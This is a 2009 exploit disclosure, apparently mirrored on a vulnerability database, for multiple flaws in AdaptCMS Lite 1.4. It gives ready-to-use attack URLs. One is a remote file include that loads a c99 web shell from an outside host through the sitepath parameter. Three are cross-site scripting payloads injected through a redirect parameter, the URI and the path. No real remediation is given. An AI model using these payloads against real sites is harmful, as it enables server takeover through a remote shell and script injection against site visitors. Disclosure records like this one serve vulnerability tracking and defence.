AdaptCMS Lite 1.4 (XSS/RFI) Multiple Remote Vulnerabilities

🗓️ 10 Feb 2009 00:00:00Reported by RootType

AdaptCMS Lite 1.4 has multiple remote vulnerabilities including Remote File Include and Remote XSS, discovered by RoMaNcYxHaCkEr. The exploits allow attackers to include remote files and execute malicious scripts.


                                                # AdaptCMS Lite 1,4 Multiple Vulnes ( Remote File Include ,  Remote XSS )

# Free Download : http://213.203.218.125/a/ad/adaptcms/AdaptCMS_Lite_1.4.zip

# Or : http://www.adaptcms.com/

- Found By : RoMaNcYxHaCkEr
- My Site : WwW.Sec-Code.CoM
- My Group : Security - Codes Group

# Exploit [1]:

- Remote File Include :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=http://www.sec-code.com/c99.txt?

# Exploit [2]:

- Remote XSS :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/index.php?view=redirect&amp;url=javascript:alert(413528022209)

Cross Site Scripting in URI :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/index.php?acuparam=&gt;'&gt;&lt;ScRiPt&gt;alert(435038069432)&lt;/ScRiPt&gt;

Cross Site Scripting in path :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/?=&gt;&quot;'&gt;&lt;ScRiPt&gt;alert(438948070551)&lt;/ScRiPt&gt;

# Solutions :

Contact With Me I Will Declear All This Fucking Functions

# rXh

# bEST wISHES

10 Feb 2009 00:00Current

7.1High risk

Vulners AI Score7.1